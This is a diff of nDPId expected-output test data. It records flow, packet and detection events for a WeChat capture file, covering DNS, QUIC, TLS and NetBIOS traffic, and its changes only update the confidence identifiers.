{"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1492167650345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1492167650345,"pkt":"eJKcD6iO8IQvSpdgCABFoADcAABAAEARtLvAqAH+wKgBZwA17JIAyGqeKzmBgAABAAEABAAEA3NzbAdnc3RhdGljA2NvbQAAAQABwAwAAQABAAAAHQAErNkXQ8AQAAIAAQACif4ADQNuczEGZ29vZ2xlwBjAEAACAAEAAon+AAYDbnM0wEHAEAACAAEAAon+AAYDbnMywEHAEAACAAEAAon+AAYDbnMzwEHAPQABAAEABTcbAATY7yAKwGgAAQABAAUtSQAE2O8iCsB6AAEAAQAFLUkABNjvJArAVgABAAEABS1JAATY7yYK"} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167650345,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167650345,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1492167650348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAVibiVAAEARQTrAqAFnrNkXQ4sRAbsFTiZlDSoBZwIONIO7UTAzNQGbgwNlLywtCSgLtCegAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zc2wuZ3N0YXRpYy5jb227JKt8ARxJVGRWJtplczZ+Y0Ub6N9qmKgMLrSZKyo986eVN4hLCQ8XNjFEbipb4AqXbG2doRLcUxXPUTAzNQHogWCSkhrofu2AhqIVgpFY8KviMDAwMDAwMDA5UDTgFLbVCW\/cQ8zfwllNkC+Y3GQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAA4qvwWAAAAABQ8MfjcV\/rNPz9nE7SSiHC6cDht5RKlsv0JChHgsKm0olGM4pgTHU2HYUvFhtNkOqQx\/75FAQP87Et+xOmGXIhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees8hQEA9eDJxrTnigGUXAfpWeAkSroNTkBs4scsx1Ra2LSNreNDFvpSDuqq6UeKpHg6NTM40g2RnXl5QzirTperKCTKzWwn+4\/bmuO2uGlriSPr4ExcTigYtlruN8fxdgnsCAuRhi2\/JFjFnbJqpKvDwpzJerd7H8C9zsxPzgMehsK4\/vItkCcZuwJmgaicPHLBf9M3RGKygCyV25zBdoSYTv7XUf5XBhgAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 00922{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1492167650348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCbiZAAEARRRnAqAFnrNkXQ4sRAbsBbnP9DSoBZwIONIO7UTAzNQLoUPe6\/kTOTlflPotTtybyc+JAmHNEvZwUaT+Y9MqSJDNXVlUHwBVN0wAQzobHU4rvOkVihYNG2ScjXRicw6QFTtMMe25DwzQ7F0UKP\/Y\/8HMbQmw9b+v7cjBNs8yLamuYyeUaQ6lA73AshAIuQPhL6IslIuIHWs+l0MLo2wd57CZSUFbeEQQGDWtD8b5mwEuaZ88hm8yA3WeZQ9Zu4UUro5Belh+M9DB8RCMbVDEQZk6oJR+FSwF3TriZCorpIzSRESc2crvu7FP1Tb9g0NyoL87e9cFlDFVypNQfdhNO+iEyVuMUtOGb6OQn1vrWvB\/icrLc4DopKhApNyBIG\/+MQmYuPalP+mCA4FXxaPeMi1RdjyuuqxJb39HK+6wmJsCzWDR6cvDTk6ywHmETP0AOjEu+QTifJk6chcMbgKmp0ErfBPvocLYD7Yj8Qw2lL48a1tEWZIz4lw=="} 02264{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1492167650401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167650401,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcRt7+s2RdDwKgBZwG7ixEFTkCsBPCmO80d\/CW5IJoqjbn6lzjr5TC1v3d2foeU3jLNcA4IAV35th92JTinR3E92La4uW3lsByHG3R1axVDDHGrIc2Dhs2S+7aBzkyVbwcuUK77hYdmfJ4TJuEFhTaYjceo9r51oYeJqOHOCc1BBmB5E+A58P\/H55fRg4dxRA9v1f2aVQ6I67HK4M7mS7147fzZ170E12rNhRLBsPAWwZ8U93ZWKjAcVK9waq7ihKZ\/GTyfNPuOCQnhcxCFRMVEx2xx65NSFauaw3a1qVgRV428j6Bchcyom0cvPgxBbWJUmObxkeqmQAFmTPCN6igcJnamWF5CRIXtlRtvIVi8G3Rds0EdWXNYvxaTSkwCziFaIH6mAaz9hCwjxATLUAdqd1Yo+wN5ikpGmpiBzh3Coj125lb7YXMKgdIF\/8K12iKaeICQ1ArpMEt9vvWxk35P363XmPN9SjUjvFqh8rl+ETiuGHzQwTYDZUwFRT8Tnc90FuuWkSHrjLuI78eE0u2MPArYDWbkXnAkM9f\/B1mpEGpwrQCQA0PHuwaHNDaEcqfk+htDhYfF2k76y25VNuFHeOfHnAe8W\/L6MSq0NvvJdxpclRqAM5S2hcBrDwho6FgiBa0XuPrQx61q\/3nmcTSWb0DXXos+FWaLGj1Jg4cyk4xSeKoZfxTTY8qOxPxWcSNcXXGMVMwz3NtJzwB28A6uPq8NBF+APnNiUzkLELf20sskbghw4Wvw2P5GvZ6Z0iUqrAzGSGc0IroovL34w3TMmjBnTPzAWKnwYJxIrcFH65r\/43AXULA7mwVKw7TuryWaAn8PVofDMn5VL+m8Bc4anaE3270Gx7DXXa3CWGylYl6IhspD51Ji7UqD6pJpDanmkxF7QRS0mZz7M+VCAuE5+TvKpba5WKwmCrXKMkHXnBfHSx4yC\/BngUmyj5AqU\/35FBtHK2MhZhT3uv3ixGib\/DhROgxNj\/fCIDmyLmZy6LuI15IWBQr2uiGWD15jLW9srpQ3r\/cpXrjFWrIOILP7BDqFX16AVMtIyhn8QUmpyMBzWR3rPBVnAwwCQUSi7lOuHYSBa2JAApapl8ibPeq+IESORJ2WC1jpiGlKVsyKHvCUxM4DB9CDGl+VMCLfBwTUsv9jC9A0oISxfI+skno\/pMiMhfE+1+tVpq0kVbytQk5I14sgZgoXLliJYkFCOr3ikDyMImPkBDegikF\/nhKUricS6KkRKOBVEDYofUgm6hebzs7TAwbIX0LHGrieMSNYdiZ\/RaP9BKZ7WUS7z8Jvlw3DtdXYHHGY\/9m62j8jgUA89FYp2sdoaRFheoQUmxEE6EpSZHWMo5+AT1rvxDTcNLYyAF\/NKlyP79gaAWae04vlwFQ4Bupkoby3AV8qNrlb42pc54gLBwr2\/V8SfP1Jf8GHKLnbnMMGzz8c8g08IQe\/1e7EH9oyogw0WeUU2ddyxaRPwa4eLAdObHTP\/jn7fsHAYVorRI56TLQ62d12KS2GZw3\/dElBm43NGOyNU1Hp381LUrTlDOWD2CkkP1QCRN+zezQnIAdftR9GtZfdliGgi4n+DRQuugUUjAENUiyLbjua9o3CfXKyGh5RlHt3r219Xp7bzpU2Sa3x2tOlotON5hkk2pmORaeO3NrbIHwpGOzFl20\/4Mhk6xhdUZeHJoEN7V1+kqNLH9CANDu7wpMSMlhqJfpnckBvaCh9BXX3VOJErUyDwJ\/yEG1ZNKGdvcDhAfCDrZsIbxElU8wBdoFg5g3GjSgWUZyHIUdESjz3nA05zyGh0UQ5UNTBZNmAzAGEZvPJPDUf"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1492167654504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167654504,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsBAAEAGBoXAqAFny82XotNaAbub+DW+SvgsEIARAOUK7AAAAQEICgAx4GBFrgFX"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1492167669545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1492167669545,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwPUUAAIARd2TAqAFkwKgB\/wCKAIoA3H9oEQ7+\/cCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1492167690433,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167690433,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9oAAAEC8bHAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695237,"flow_last_seen":1492167695237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695237,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1492167695237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695237,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8M9xAAEAG4WDAqAFny82XotNlAbtEgzv7AAAAAKACchBSeAAAAgQFtAQCCAoAMggnAAAAAAEDAwc="} @@ -302,52 +302,50 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1492167695488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695488,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8xuRAAEAGTljAqAFny82XotNmAbsIrs6CAAAAAKACchD7hQAAAgQFtAQCCAoAMghmAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702WgJJlmRIM7\/KASN8ga\/wAAAgQFoAQCCApF0vJmADIIJwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695562,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0M91AAEAG4WfAqAFny82XotNlAbtEgzv8oCSZZ4AQAOWASQAAAQEICgAyCHhF0vJm"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1492167695854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695854,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702aaLHzgCK7Og6ASN8jmSwAAAgQFoAQCCApF0vKlADIIZgEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1492167695854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695854,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0xuVAAEAGTl\/AqAFny82XotNmAbsIrs6Dmix84YAQAOVLjAAAAQEICgAyCMFF0vKl"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 